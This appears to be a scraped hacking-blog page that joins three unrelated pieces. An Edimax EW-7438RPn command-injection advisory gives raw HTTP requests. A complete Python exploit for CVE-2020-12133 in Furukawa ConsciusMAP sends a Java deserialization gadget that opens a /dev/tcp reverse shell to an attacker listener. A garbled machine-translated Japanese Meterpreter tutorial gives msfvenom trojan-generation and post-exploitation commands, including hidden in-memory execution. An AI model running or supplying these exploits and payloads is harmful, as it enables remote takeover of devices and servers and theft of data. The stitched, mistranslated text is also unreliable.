# Exploit Title: Edimax EW-7438RPn 1.13 - Remote Code Execution
# Date: 2020-04-23
# Exploit Author: Besim ALTINOK
# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/
# Version:1.13
# Tested on: Edimax EW-7438RPn 1.13 Version
------
NOTE: This device configurated with root permissions. So you can run the
command as root
Here is the detail(s) of the RCE(s)
1- Content of the mp.asp file
<form action="/goform/mp" method="POST" name="mp">
<input type="text" name="command" value=""> <input
type="submit" value="GO">
<input type="hidden" name="getID" value="">
<input type="hidden" name="getID" value="">
</form>
RCE Detail:
-------------------------------
POST /goform/mp HTTP/1.1
Host: 192.168.2.2
User-Agent: Mozilla/5.0 *********************
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
DNT: 1
Authorization: Basic YWRtaW46MTIzNA==
Connection: close
Cookie: language=1
Upgrade-Insecure-Requests: 1
command=||busybox+ls&getID=
-------------------------------
2- Content of the syscmd.asp
<form action=/goform/formSysCmd method=POST name="formSysCmd"><table
border=0 width="500" cellspacing=0 cellpadding=0>
<tr><font size=2>
This page can be used to run target system command.</tr>
<tr><hr size=1 noshade align=top></tr>
<tr> <td>System Command: </td>
<td><input type="text" name="sysCmd" value="" size="20" maxlength="50"></td>
<td> <input type="submit" value="Apply" name="apply" onClick='return
saveClick()'></td></form>
RCE Detail:
-------------------------------
POST /goform/formSysCmd HTTP/1.1
Host: 192.168.2.2
User-Agent: Mozilla/5.0 *********************
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
DNT: 1
Authorization: Basic YWRtaW46MTIzNA==
Connection: close
Cookie: language=1
Upgrade-Insecure-Requests: 1
sysCmd="command to here"
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863157935
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution
# Date: 2020-04-24
# Vendor Homepage: https://www.tecnoredsa.com.ar
# Exploit Authors: LiquidWorm
# Software Link: https://dl.getpopcorntime.is/PopcornTime-latest.exe
# Version: 2.8.1
# CVE : N/A
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Furukawa Electric ConsciusMAP 2.8.1 Java Deserialization Remote Code Execution
#
#
# Vendor: Furukawa Electric Co., Ltd. | Tecnored SA
# Product web page: https://www.furukawa.co.jp | https://www.tecnoredsa.com.ar
# Affected version: APROS Evolution | 2.8.1
# FURUKAWA | 2.7.10
# ConsciusMAP | 2.6.4
# | 2.3.1
# | 2.1.49
# | 2.1.36
# | 2.1.31
# | 2.1.18
# | 2.1.16
# | 2.1.15
# | 2.1.1
# | 2.0.1174
# | 1.8
# | 1.4.70
#
# Summary: Apros Evoluation / Furukawa / ConsciusMap is the Tecnored
# provisioning system for FTTH networks. Complete administration of
# your entire external FTTH network plant, including from the ONUs
# installed in each end customer, to the wiring and junction boxes.
# Unify all the management of your FTTH network on a single platform.
# Unify all your data, whether from customers, your network, or the
# external plant in one place. APROS FTTH allows you to manage your
# entire FTTH network in a simple and globalized way with just one
# click, without being a network expert. Includes services such as:
# bandwidth limitation, Turbo Internet for time plans, BURST Internet,
# QinQ for companies, and many more. General consumption graphics and
# per customer in real time. Captive Portal for cutting or suspension
# of the service.
#
# Desc: The FTTH provisioning solution suffers from an unauthenticated
# remote code execution vulnerability due to an unsafe deserialization
# of Java objects (ViewState) triggered via the 'javax.faces.ViewState'
# HTTP POST parameter. The deserialization can cause the vulnerable JSF
# web application to execute arbitrary Java functions, malicious Java
# bytecode, and system shell commands with root privileges.
#
# ===================================================================
# $ ./furukawa.py 172.16.0.1:8080 172.168.0.200 4444
# [*] Setting up valid URL path
# [*] Starting callback listener child thread
# [*] Starting handler on port 4444
# [*] Sending serialized object
# [*] Connection from 172.16.0.1:48446
# [*] You got shell!
# tomcat7@zslab:/var/lib/tomcat7$ id
# uid=114(tomcat7) gid=124(tomcat7) grupos=124(tomcat7),1003(furukawa)
# tomcat7@zslab:/var/lib/tomcat7$ sudo su
# id
# uid=0(root) gid=0(root) grupos=0(root)
# exit
# tomcat7@zslab:/var/lib/tomcat7$ exit
# *** Connection closed by remote host ***
# ===================================================================
#
# Tested on: Apache Tomcat/7.0.68
# Apache Tomcat/7.0.52
# Apache MyFaces/2.2.1
# Apache MyFaces/2.1.17
# Apache MyFaces/2.0.10
# GNU/Linux 4.4.0-173
# GNU/Linux 4.4.0-137
# GNU/Linux 4.4.0-101
# GNU/Linux 4.4.0-83
# GNU/Linux 3.15.0
# GNU/Linux 3.13.0-32
# PrimeFaces/4.0.RC1
# Apache-Coyote/1.1
# ACC Library 3.1
# Ubuntu 16.04.2
# Ubuntu 14.04.2
# Java/1.8.0_242
# Java/1.8.0_181
# Java/1.8.0_131
# Java/1.7.0_79
# MySQL 5.7.29
# MySQL 5.7.18
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Macedonian Information Security Research and Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2020-5565
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5565.php
#
# CVE ID: CVE-2020-12133
# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-12133
#
#
# 24.02.2020
#
import os#############
import sys############
import gzip#######o###
import zlib###########
import socket#########
import base64#########
import urllib#########
import requests#######
import telnetlib######
import threading######
import subprocess#####
from io import BytesIO
from time import sleep
from flash import blic
class Optics:
def __init__(self):
self.callback = None#
self.headers = None##
self.payload = None##
self.target = None###
self.lport = None####
self.path = None#####
self.cmd = None######
def allears(self):
telnetus = telnetlib.Telnet()
print("[*] Starting handler on port {}".format(self.lport))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", self.lport))
while True:
try:
s.settimeout(8)
s.listen(1)
conn, addr = s.accept()
print("[*] Connection from {}:{}".format(addr[0], addr[1]))
telnetus.sock = conn
except socket.timeout as p:
print("[!] Probably not vulnerable... ({poraka})".format(poraka=p))
print("[+] Check your port mappings.")
s.close()
exit(0)
break
print("[*] You got shell!")
#
# UnicodeDecodeError dirty fix:
# /usr/lib/python3.6/telnetlib.py
# Change from 'ascii' to 'utf-8' (Lines: 553 and 556)
#
telnetus.interact()
conn.close()
def thricer(self):
print("[*] Starting callback listener child thread")
konac = threading.Thread(name="ZSL", target=self.allears)
konac.start()
sleep(1)
self.gadget()
def gadget(self):
self.cmd = "/bin/bash -c /bin/bash${IFS}-i>&/dev/tcp/"
self.cmd += self.callback
self.cmd += "/"
self.cmd += str(self.lport)
self.cmd += "<&1"
payload = b"\xAC\xED\x00\x05\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C"
payload += b"\x2E\x48\x61\x73\x68\x53\x65\x74\xBA\x44\x85\x95\x96\xB8\xB7\x34\x03"
payload += b"\x00\x00\x78\x70\x77\x0C\x00\x00\x00\x02\x3F\x40\x00\x00\x00\x00\x00"
payload += b"\x01\x73\x72\x00\x34\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63"
payload += b"\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E"
payload += b"\x73\x2E\x6B\x65\x79\x76\x61\x6C\x75\x65\x2E\x54\x69\x65\x64\x4D\x61"
payload += b"\x70\x45\x6E\x74\x72\x79\x8A\xAD\xD2\x9B\x39\xC1\x1F\xDB\x02\x00\x02"
payload += b"\x4C\x00\x03\x6B\x65\x79\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61"
payload += b"\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x4C\x00\x03\x6D\x61\x70\x74"
payload += b"\x00\x0F\x4C\x6A\x61\x76\x61\x2F\x75\x74\x69\x6C\x2F\x4D\x61\x70\x3B"
payload += b"\x78\x70\x74\x00\x26\x68\x74\x74\x70\x73\x3A\x2F\x2F\x67\x69\x74\x68"
payload += b"\x75\x62\x2E\x63\x6F\x6D\x2F\x6A\x6F\x61\x6F\x6D\x61\x74\x6F\x73\x66"
payload += b"\x2F\x6A\x65\x78\x62\x6F\x73\x73\x20\x73\x72\x00\x2A\x6F\x72\x67\x2E"
payload += b"\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F"
payload += b"\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x6D\x61\x70\x2E\x4C\x61\x7A"
payload += b"\x79\x4D\x61\x70\x6E\xE5\x94\x82\x9E\x79\x10\x94\x03\x00\x01\x4C\x00"
payload += b"\x07\x66\x61\x63\x74\x6F\x72\x79\x74\x00\x2C\x4C\x6F\x72\x67\x2F\x61"
payload += b"\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F\x63\x6F\x6C"
payload += b"\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72"
payload += b"\x6D\x65\x72\x3B\x78\x70\x73\x72\x00\x3A\x6F\x72\x67\x2E\x61\x70\x61"
payload += b"\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65"
payload += b"\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E\x43"
payload += b"\x68\x61\x69\x6E\x65\x64\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72"
payload += b"\x30\xC7\x97\xEC\x28\x7A\x97\x04\x02\x00\x01\x5B\x00\x0D\x69\x54\x72"
payload += b"\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x73\x74\x00\x2D\x5B\x4C\x6F\x72"
payload += b"\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F"
payload += b"\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73"
payload += b"\x66\x6F\x72\x6D\x65\x72\x3B\x78\x70\x75\x72\x00\x2D\x5B\x4C\x6F\x72"
payload += b"\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E"
payload += b"\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x54\x72\x61\x6E\x73"
payload += b"\x66\x6F\x72\x6D\x65\x72\x3B\xBD\x56\x2A\xF1\xD8\x34\x18\x99\x02\x00"
payload += b"\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3B\x6F\x72\x67\x2E\x61\x70"
payload += b"\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C"
payload += b"\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E"
payload += b"\x43\x6F\x6E\x73\x74\x61\x6E\x74\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D"
payload += b"\x65\x72\x58\x76\x90\x11\x41\x02\xB1\x94\x02\x00\x01\x4C\x00\x09\x69"
payload += b"\x43\x6F\x6E\x73\x74\x61\x6E\x74\x71\x00\x7E\x00\x03\x78\x70\x76\x72"
payload += b"\x00\x11\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x52\x75\x6E\x74\x69"
payload += b"\x6D\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72"
payload += b"\x00\x3A\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D"
payload += b"\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66"
payload += b"\x75\x6E\x63\x74\x6F\x72\x73\x2E\x49\x6E\x76\x6F\x6B\x65\x72\x54\x72"
payload += b"\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x87\xE8\xFF\x6B\x7B\x7C\xCE\x38"
payload += b"\x02\x00\x03\x5B\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5B\x4C\x6A"
payload += b"\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x4C"
payload += b"\x00\x0B\x69\x4D\x65\x74\x68\x6F\x64\x4E\x61\x6D\x65\x74\x00\x12\x4C"
payload += b"\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B"
payload += b"\x5B\x00\x0B\x69\x50\x61\x72\x61\x6D\x54\x79\x70\x65\x73\x74\x00\x12"
payload += b"\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73"
payload += b"\x3B\x78\x70\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E"
payload += b"\x67\x2E\x4F\x62\x6A\x65\x63\x74\x3B\x90\xCE\x58\x9F\x10\x73\x29\x6C"
payload += b"\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0A\x67\x65\x74\x52\x75"
payload += b"\x6E\x74\x69\x6D\x65\x75\x72\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2E\x6C"
payload += b"\x61\x6E\x67\x2E\x43\x6C\x61\x73\x73\x3B\xAB\x16\xD7\xAE\xCB\xCD\x5A"
payload += b"\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4D"
payload += b"\x65\x74\x68\x6F\x64\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x02\x76\x72"
payload += b"\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E"
payload += b"\x67\xA0\xF0\xA4\x38\x7A\x3B\xB3\x42\x02\x00\x00\x78\x70\x76\x71\x00"
payload += b"\x7E\x00\x1B\x73\x71\x00\x7E\x00\x13\x75\x71\x00\x7E\x00\x18\x00\x00"
payload += b"\x00\x02\x70\x75\x71\x00\x7E\x00\x18\x00\x00\x00\x00\x74\x00\x06\x69"
payload += b"\x6E\x76\x6F\x6B\x65\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x02\x76\x72"
payload += b"\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4F\x62\x6A\x65\x63"
payload += b"\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00"
payload += b"\x7E\x00\x18\x73\x71\x00\x7E\x00\x13\x75\x72\x00\x13\x5B\x4C\x6A\x61"
payload += b"\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E\x67\x3B\xAD\xD2"
payload += b"\x56\xE7\xE9\x1D\x7B\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00"
payload += (bytes(chr(len(self.cmd)), "utf-8"))##################################"
payload += (bytes(self.cmd, "utf-8"))############################################"
payload += b"\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x01"
payload += b"\x71\x00\x7E\x00\x20\x73\x71\x00\x7E\x00\x0F\x73\x72\x00\x11\x6A\x61"
payload += b"\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x49\x6E\x74\x65\x67\x65\x72\x12\xE2"
payload += b"\xA0\xA4\xF7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6C\x75\x65"
payload += b"\x78\x72\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4E\x75\x6D"
payload += b"\x62\x65\x72\x86\xAC\x95\x1D\x0B\x94\xE0\x8B\x02\x00\x00\x78\x70\x00"
payload += b"\x00\x00\x01\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E"
payload += b"\x48\x61\x73\x68\x4D\x61\x70\x05\x07\xDA\xC1\xC3\x16\x60\xD1\x03\x00"
payload += b"\x02\x46\x00\x0A\x6C\x6F\x61\x64\x46\x61\x63\x74\x6F\x72\x49\x00\x09"
payload += b"\x74\x68\x72\x65\x73\x68\x6F\x6C\x64\x78\x70\x3F\x40\x00\x00\x00\x00"
payload += b"\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x78"#######"
jbits = BytesIO()
with gzip.GzipFile(fileobj=jbits, mode="wb") as f:
f.write(payload)
serialize = base64.b64encode(jbits.getvalue())
print("[*] Sending serialized object")
self.headers = {
"Accept" : "text/html,application/xhtml+xml,application/xml;q=1.pwn",
"Content-Type" : "application/x-www-form-urlencoded",
"User-Agent" : "ISP-Eye/2.51",
"Connection" : "keep-alive"}
self.paramz={"javax.faces.ViewState" : serialize}
#sleep(1)
r = requests.post(self.target + self.path, headers=self.headers, data=self.paramz)
def par(self):
if len(sys.argv) != 4:
self.usage()
else:
self.target = sys.argv[1]
self.callback = sys.argv[2]
self.lport = int(sys.argv[3])
if not "http" in self.target:
self.target = "http://{}".format(self.target)
def check(self):
print("[*] Setting up valid URL path")
try:
r = requests.get(self.target)
app = r.text
if not "FURUKAWA" in app and not "APROS" in app:
print("[!] App not detected.")
exit(0)
if "FURUKAWA" in app:
self.path = "/FURUKAWA/"
elif "APROS" in app:
self.path = "/APROS/"
else:
exit(-1337)
except Exception as p:
print("[!] Somethingz wrong: \n--\n{poraka}".format(poraka=p))
exit(0)
def framed(self):
naslov = """
o===--------------------------------------===o
| |
| Furukawa Electric / Tecnored |
| APROS Evolution | FURUKAWA | ConsciusMAP |
| Fiber-To-The-Home (FTTH) |
| |
| Java Deserialization Remote Code Execution |
| ZSL-2020-5565 |
| |
o===--------------------------------------===o
||
||
(\__/)||
(•ㅅ•)||
/ づ|
"""
print(naslov)
def usage(self):
self.framed()
print("Usage: ./furukawa.py <RHOST[:RPORT]> <LHOST> <LPORT>")
print("Example: ./furukawa.py 172.16.0.1:8080 172.16.0.200 4444\n")
exit(0)
def main(self):
self.par()########()
self.check()######()
self.thricer()####()
if __name__ == '__main__':
Optics().main()
0x01pirst学習メータープレーター
1.1.メータープレターとは何ですか
MeterPreterは、MetaSploitフレームワークの拡張モジュールです。オーバーフローが成功した後、攻撃ペイロードとして使用されます。オーバーフロー攻撃が成功した後、攻撃ペイロードはコントロールチャネルを返します。攻撃のペイロードとして使用すると、ターゲットシステムのメータープレターシェルへのリンクを取得できます。 MeterPreter Shellには、ユーザーの追加、何かの隠れ、ユーザーのパスワードの開き、リモートホストのファイルのアップロードとダウンロード、CMD.exeの実行、画面のキャプチャ、リモートコントロールのキャプチャ、キー情報の取得、キー情報の取得、アプリケーションのクリア、リモートホストのシステム情報の表示などのマシンなどのインターフェースの表示などの表示など、浸透モジュールとして多くの有用な機能があります。リモートホストに身を隠すと、システムハードディスク内のファイルが変更されないため、HIDS [ホストベースの侵入検知システム]が応答することは困難です。 In addition, the system time varies when it is running, so tracking it or terminating it can also become very difficult for an experienced person.
最後に、MeterPreterは複数のセッションを作成するタスクを簡素化することもできます。これらのセッションは、浸透に使用できます。 Metasploitフレームワークでは、MeterPreterは浸透後のツールであり、動作中に動作中に拡張できる動的でスケーラブルなペイロードです。このツールは、「メモリDLLインジェクション」の概念に基づいて実装されています。これにより、ターゲットシステムは、新しいプロセスを作成し、注入されたDLLを呼び出すことにより、注入されたDLLファイルを実行できます。その中で、ターゲットデバイス内の攻撃者とメータープレターとの間の通信は、ステージャーソケットを介して実装されています。浸透後モジュールとしてはメータープレターには多くの種類があり、コマンドはコアコマンドと拡張ライブラリコマンドで構成されており、攻撃方法を大幅に濃縮しています。
MeterPreterを説明する必要がある場合、脆弱性が正常に活用された後、コードの第2フェーズとMeterPreterサーバーDLLが送信されます。したがって、ネットワークの不安定な場合、多くの場合、実行可能なコマンドがないか、セッションの確立とヘルプの実行が欠落していることがわかります。これは、VPNに接続し、イントラネットでPSEXECとBIND_TCPを使用するときにしばしば発生します。
1.2.meterpreterテクノロジーの利点
MetaSploitは、WindowsやLinuxなどのさまざまな主流プラットフォームのメータープレターバージョンを提供し、X86およびX64プラットフォームをサポートしています。さらに、MeterPreterはPHP言語とJava言語に基づいた実装も提供しています。 MeterPreterの作業モードは純粋なメモリであり、利点は起動して隠されていることです。これは、ウイルス対策ソフトウェアで監視することが困難です。ターゲットホストディスクにアクセスする必要はないため、侵入の兆候はありません。上記に加えて、MeterPreterはRuby Scripting Extensionsもサポートしています。したがって、ルビー言語はまだ必要です。
0x02メータープレーターの一般的なリバウンドタイプ
1.Reverse_TCP
これはTCPベースのバックリンクリバウンドシェルであり、使用するのが非常に安定しています
(1)Linux:
次のコマンドを使用して、Linuxの下でリバウンドシェルトロイの木馬を生成します。
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.102 lport=4444 -f elf -o shell
上の写真を見ると、TrojanファイルのISShellがディレクトリで正常に生成されていることがわかります。次に、ファイルに実行可能な権限を追加します。次に、MetaSploitを開き、モジュールハンドラーを使用して、ペイロードを設定します。注:ここのペイロードセットは、トロイの木馬を生成するために使用するペイロードと同じでなければなりません。
アドレスとポートを設定すると、リスニングを開始します
ここでリバウンドシェルトロイの木馬を実行すると、シェルにリバウンドされたことがわかります。
(2)Windows:
msfvenom -p windows/meterpreter/reverse_tcp lhost=[your ip] lport=[port] -f exe -oファイル名を生成する
MSFVENOM -P Windows/MeterPreter/Reverse_TCP LHOST=192.168.1.102 LPORT=4444 -F EXE -O SHELL.EXE
リバース接続シェルは使用するのが非常に安定しているため、LHOSTを設定する必要があります
2.Reverse_http
HTTPメソッドに基づく逆接続は、ネットワーク速度が遅い場合、不安定です。
payload:/windows/meterpreter/reverse_http
3.Reverse_Https
HTTPSメソッドに基づく逆接続は、ネットワーク速度が遅い場合、不安定です。 HTTPSがリバウンドする場合は、リスニングポートを443に変更してみてください。
payload:/windows/meterpreter/reverse_https
4.bind_tcp
これは、TCPに基づくフォワード接続シェルです。イントラネットがネットワークセグメントを横断しているときに攻撃機に接続できないため、イントラネットでよく使用され、LHOSTの設定を必要としません。
次のコマンドを使用して、トロイの木馬を生成します。
msfvenom -p linux/x86/meterpreter/bind_tcp
lport=4444 -f elf -o shell
同じことは、権限で実行され、デモンストレーションはありません。
ここで、設定したIPアドレスとポートはターゲットマシンからのものであることに注意してください。これが私たちがそれをつなぐためにイニシアチブをとるものだからです。
0x03関連ペイロード
ペイロードには、リモートシステムで実行する必要がある悪意のあるコードが含まれています。 Metasploitでは、ペイロードはモジュールを悪用するために実行できる特別なモジュールであり、ターゲットシステムのセキュリティの脆弱性を活用して攻撃を実装できます。要するに、このエクスプロイトモジュールはターゲットシステムにアクセスでき、そのコードはターゲットシステムでのペイロードの動作を定義します。
Metasploitには、ペイロードモジュールには3つの主要なタイプがあります。
-シングル
- スターガー
-ステージ
シングルは完全に独立したペイロードであり、システムユーザーの追加やファイルの削除など、calc.exeを実行するのと同じくらい簡単です。シングルのため
ペイロードは完全に独立しているため、NetCatのような非メタプロイト処理ツールに捕まることがあります。
Stager Payloadsは、ターゲットユーザーと攻撃者間のネットワーク接続を確立し、追加のコンポーネントまたはアプリケーションをダウンロードする責任があります。一般的なステージャーのペイロードはReverse_TCPです。これにより、ターゲットシステムは攻撃者とのTCP接続を確立できます。別の一般的なタイプはbind_tcpです。これにより、ターゲットシステムはTCPリスナーを有効にし、攻撃者はいつでもターゲットシステムと通信できます。
ステージはステージャーです
ペイロードによってダウンロードされたペイロードコンポーネントこのペイロードは、サイズ制限なしでより高度な機能を提供できます。
Metasploitでは、ペイロードの名前と使用される形式でそのタイプを推測できます。
単一ペイロードの形式はターゲット/シングルです
ステイガー/ステージペイロード形式は、ターゲット/ステージ/ステイガーです
Metasploitで「Payloadsを表示」コマンドを実行すると、利用可能なペイロードのリストが表示されます。
このリストでは、Windows/PowerShell_Bind_TCPは単一のペイロードであり、ステージのペイロードは含まれていません。 Windows/x64/meterpreter/reverse_tcpはステイガーです
ペイロード(Reverse_TCP)とステージペイロード(MeterPreter)。
0x04メータープレーターの共通コマンド
1。基本コマンド
ヘルプ#MeterPreterヘルプを確認してください
バックグラウンド#返品、ハングメータープレターの背景
BGKILL#バックグラウンドメータープレータースクリプトを殺します
BGLIST#は、実行中のすべてのバックグラウンドスクリプトのリストを提供します
bgrun#バックグラウンドスレッドとしてスクリプトを実行します
チャンネル#アクティブチャネルを表示します
セッション-i番号#セッションと対話します。番号はn番目のセッションを意味します。セッション-iを使用して、指定されたシーケンス番号にメータープレターセッションに接続し続けています。
セッション-K番号
#interact with Conversation
#クローズチャンネルを閉じます
終了#メータープレターセッションを終了します
QUIT#メータープレターセッションを終了します
ID #switchをチャンネルに操作します
#既存のモジュールを実行します。ここで言いたいのは、走行してタブを2回クリックした後、既存のすべてのスクリプトが一覧表示されるということです。一般的に使用されるものには、Autoroute、Hashdump、arp_scanner、multi_meter_injectなどが含まれます。
IRB#Rubyスクリプトモードを入力します
#チャネルのデータを読む
#write data fort data fo a Channel
MeterPreterスクリプトを選択した後、実行およびbgrun#前景と背景実行
MeterPreterの拡張機能をロードする#を使用します
#ロードモジュールをロード/使用します
リソース#既存のRCスクリプトを実行します
2。ファイルシステムコマンド
CAT C: \ boot.ini#ファイルの内容を表示すると、ファイルが存在する必要があります
del C: \ boot.ini #delete指定されたファイル
upload /root/desktop/netcat.exe c: \#setup.exeのアップロードなど、ファイルをターゲット所有者にアップロードします
c: \\ windows \\ system32 \
nimeia.txt/root/desktop/#ダウンロード:c: \\ boot.ini/root/またはダウンロードなど、ファイルをマシンにダウンロードしてください
c: \\ 'programfiles' \\ tencent \\ qq \\ users \\ 295 ****** 125 \\ msg2.0.db
/根/
編集c: \ boot.ini#
ファイルを編集します
getLWD#ローカルディレクトリを印刷します
getwd#print作業ディレクトリ
LCD#ローカルディレクトリを変更します
LS#現在のディレクトリのファイルのリストをリストします
LPWD#ローカルディレクトリを印刷します
PWD#出力作業ディレクトリ
CD C: \\ #enterディレクトリファイル
RMファイル#Deleteファイル
MKDIR DIER #Create Directoryの被害者システム
RMDIR#被害者システムに関する配信ディレクトリ
dir#ターゲットホストのファイルとフォルダー情報をリスト
MV#ターゲットホストのファイル名を変更します
検索-D d: \\ www -f web.config #searchファイル、d c: \\ -f*.docなど
MeterPreter Search -F AutoExec.BAT #Search FILEのSearch
MeterPreter Search -F Sea*.BAT C: \\ XAMP \\
enumdesktops #Number of User Logins
(1)ファイルをダウンロードします
コマンド「ダウンロード +ファイルパス」を使用して、ターゲットマシンの対応する権限のパスの下にファイルをダウンロードします
(2)ファイルをアップロードします
「アップロード」コマンドは、ファイルをターゲットマシンにアップロードすることです。図では、LL.TXTをターゲットマシンのC: \ PP \にアップロードしました。
(3)ファイルを表示します
「Cat Filename」は、現在のディレクトリのファイルコンテンツを表示します。コマンドを入力した後、表示しているファイルのコンテンツを返します。
(4)現在のパスを切り替えて照会します
「PWD」コマンドは、DOSコマンドの下の現在のパスを照会します。 「CD」コマンドは、下の図に示すように、現在のパスを変更できます。CD.は、現在のパスの下の前のディレクトリに切り替えることです。
(5)「sysinfo」コマンド
「sysinfo」コマンドは、リモートホストのシステム情報を表示し、コンピューター、システム情報、構造、言語、その他の情報を表示します。リモートホストのオペレーティングシステムはWindows XP Service Pack 2であり、このシステムには多くの脆弱性があることがわかります。
(6)コマンドを実行します
「実行」コマンドは、ターゲットホストのコマンドを実行します。ここで、「execute -H」がヘルプ情報を表示します。 -fは、実行するコマンドを実行することです。
ターゲットホストでプログラムを実行します。たとえば、現在プロセスをExplorer.exeに注入した後、実行ユーザーはスーパーマネージャー管理者です
ターゲットホストでメモ帳プログラムを実行しましょう
execute -fnotepad.exe
下の図に示すように、メモ帳プログラムがターゲットホストにすぐに表示されます:
これはあまりにも明白です。バックグラウンド実行を非表示にする場合は、パラメーター-Hを追加します
execute -h -fnotepad.exe
この時点で、ターゲットホストのデスクトップは応答しませんでしたが、MeterPreterセッション
でPSコマンドを使用してそれを見ました
別のものを見てください。ターゲットホストでCMD.exeプログラムを実行し、隠された方法でメータープレーターセッションで直接対話します。
注文:
execute -h -i -fcmd.exe
これは、シェルコマンドを使用するのと同じ効果を達成します
もう1つのことは、ターゲットホストのメモリでWCE.EXEやTrojanなどのターゲットホストの攻撃プログラムを直接実行して、ターゲットホストのハードディスクで発見または殺されることを避けるためです。
execute -h -m -d notepad.exe -f wce.exe -a
'-owce.txt'
-dターゲットホストが実行されたときに表示されるプロセス名(変装のため)
-mメモリから直接実行します
'-owce.txt'は、wce.exeの実行パラメーターです
(7)IDLETIMEコマンド
「idletime」コマンドは、ターゲットマシンが現在の操作なしコマンドに期限切れになった時間を表示します。図のディスプレイは、ターゲットホストが9分19秒前に操作を行うことを意味します。
(8)コマンドを検索します
「検索」コマンドは、ターゲットホストの特定のファイルを検索します。このコマンドは、システム全体または特定のフォルダーを検索できます。
「検索-H」コマンドを使用して、検索コマンドのヘルプ情報を表示します。
